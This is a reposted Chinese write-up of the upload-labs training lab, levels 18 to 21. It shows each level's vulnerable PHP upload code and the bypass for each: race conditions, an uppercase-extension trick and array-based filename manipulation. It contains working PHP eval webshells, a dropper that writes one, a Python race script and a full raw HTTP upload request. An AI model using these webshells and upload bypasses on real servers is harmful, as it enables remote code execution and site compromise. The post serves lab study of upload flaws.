碼上快樂

相關內容    簡體    繁體

Upload-labs-18-21

本文轉載自   查看原文   2020-09-30 14:38   701    安全

本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切后果與發表本文章的作者無關

測試的靶機是作者自己購買的vps搭建的環境,使用了白名單形式訪問!

Pass-18

  • 查看本關卡代碼
$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允許上傳.jpg|.png|.gif類型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上傳出錯!';
    }
}
  • 確認了代碼,存在條件競爭漏洞,大概意思就是如果能在上傳的一句話木馬被刪除之前訪問成功了,那么就可以拿shell了
  • 此類拿shell代碼如下:
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST['ant'])?>');?>
  • 將上述文件保存為tjjz.php文件,然后通過burpsuite進行抓包上傳,然后使用null  payload進行不停的重放
  • 使用python腳本訪問目標 http://106.54.35.126/upload/tjjz.php
  • python腳本如下:
import requests
url = "http://106.54.35.126/upload/tjjz.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
  • 當python腳本訪問成功的時候就說明成功將tjjz.php文件寫入到目標上傳目錄了
  • 具體看如下:我這測試沒跑出來,大家可以多試試

Pass-19

  • 查看本關卡代碼
//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已經被上傳,但沒有重命名。';
            break; 
        case -1:
            $msg = '這個文件不能上傳到服務器的臨時文件存儲目錄。';
            break; 
        case -2:
            $msg = '上傳失敗,上傳目錄不可寫。';
            break; 
        case -3:
            $msg = '上傳失敗,無法上傳該類型文件。';
            break; 
        case -4:
            $msg = '上傳失敗,上傳的文件過大。';
            break; 
        case -5:
            $msg = '上傳失敗,服務器已經存在相同名稱文件。';
            break; 
        case -6:
            $msg = '文件無法上傳,文件不能復制到目標目錄。';
            break;      
        default:
            $msg = '未知錯誤!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};
  • 此關卡跟上一關卡一樣,同樣是條件競爭,但是此關卡的是需要通過上傳圖片木馬,然后不斷的通過文件包含訪問圖片木馬
  • 具體參考:https://www.zhaosimeng.cn/writeup/74.html

Pass-20

  • 查看本關卡代碼
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上傳出錯!';
            }
        }else{
            $msg = '禁止保存為該類型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}
  • 此關卡根據源碼和提示,得知在上傳php文件的時候過濾不嚴格,可以通過上傳的時候指定后綴名稱為大寫PHP即可繞過限制直接上傳一句話拿shell

Pass-21

  • 查看本關卡代碼
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //檢查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上傳該類型文件!";
    }else{
        //檢查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上傳該后綴文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上傳成功!";
                $is_upload = true;
            } else {
                $msg = "文件上傳失敗!";
            }
        }
    }
}else{
    $msg = "請選擇要上傳的文件!";
}
  • 具體分析請查看:https://www.zhaosimeng.cn/writeup/78.html
  • 通過burpsuite構造如下請求包拿shell,注意:我這里測試不成功,因為我的環境是docker下搭建的Linux環境,此關卡生成的文件是后綴帶點的,如果是Windows環境,會被刪除點,而Linux環境不會,這個前面關卡講過了
  • 數據包如下:
POST /Pass-21/index.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Pass-21/index.php
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------8179316247298
Content-Length: 538

-----------------------------8179316247298
Content-Disposition: form-data; name="upload_file"; filename="antfx.php"
Content-Type: image/jpeg

<?php @eval($_POST['ant']);?>
-----------------------------8179316247298
Content-Disposition: form-data; name="save_name[0]"

bmfxphp.php
-----------------------------8179316247298
Content-Disposition: form-data; name="save_name[2]"

jpg
-----------------------------8179316247298
Content-Disposition: form-data; name="submit"

涓婁紶
-----------------------------8179316247298--


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 upload-labs第18關條件競爭 upload-labs 1-21關通關記錄 文件上傳之條件競爭上傳,upload-labs18關,文件上傳二次渲染 upload-labs upload-labs闖關 Upload-labs-17 sqli-labs(21) upload-labs upload-labs writeup sqli-labs(18)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM